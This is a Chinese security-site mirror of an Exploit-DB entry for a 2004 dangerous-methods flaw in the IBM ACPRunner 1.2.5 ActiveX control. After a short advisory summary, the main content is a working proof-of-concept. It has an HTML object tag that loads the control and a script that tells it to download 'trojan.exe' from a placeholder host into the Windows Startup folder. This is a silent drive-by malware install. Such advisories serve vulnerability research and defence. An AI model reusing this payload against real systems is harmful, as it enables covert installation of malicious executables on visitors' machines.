IBM ACPRunner 1.2.5 – ActiveX Control Dangerous Method

IBM ACPRunner 1.2.5 – ActiveX Control Dangerous Method

漏洞ID 1054499 漏洞类型
发布时间 2004-06-16 更新时间 2004-06-16
图片[1]-IBM ACPRunner 1.2.5 – ActiveX Control Dangerous Method-安全小百科CVE编号 N/A
图片[2]-IBM ACPRunner 1.2.5 – ActiveX Control Dangerous Method-安全小百科CNNVD-ID N/A
漏洞平台 Windows CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/24219
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/10561/info

It is reported that the IBM acpRunner ActiveX control contains dangerous methods that may result in a remote compromise of a system on which the ActiveX control is installed. These methods may be accessed by a malicious website and may result in the silent installation of a malicious executable.

A remote attacker may exploit this vulnerability in order to silently install a malicious executable on an affected system.

|object width="310" height="20"
codebase="https://www-3.ibm.com/pc/support/access/aslibmain/content/AcpC
ontrol.cab" id="runner"
classid="CLSID:E598AC61-4C6F-4F4D-877F-FAC49CA91FA3"
data="DATA:application/x-oleobject;BASE64,YayY5W9MTU+Hf/rEnKkfowADAAAKIA
AAEQIAAA==">
|object|

|script|
runner.DownLoadURL = "http://malicioussystem/trojan.exe";
runner.SaveFilePath = "..\Start Menu\Programs\Startup";
runner.FileSize = 96,857;
runner.FileDate = "01/09/2004 3:33";
runner.DownLoad();
|script|

相关推荐: WsMp3 daemon (WsMp3d)目录遍历漏洞

WsMp3 daemon (WsMp3d)目录遍历漏洞 漏洞ID 1107338 漏洞类型 路径遍历 发布时间 2003-05-21 更新时间 2003-05-21 CVE编号 CVE-2003-0338 CNNVD-ID CNNVD-200305-050 漏…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享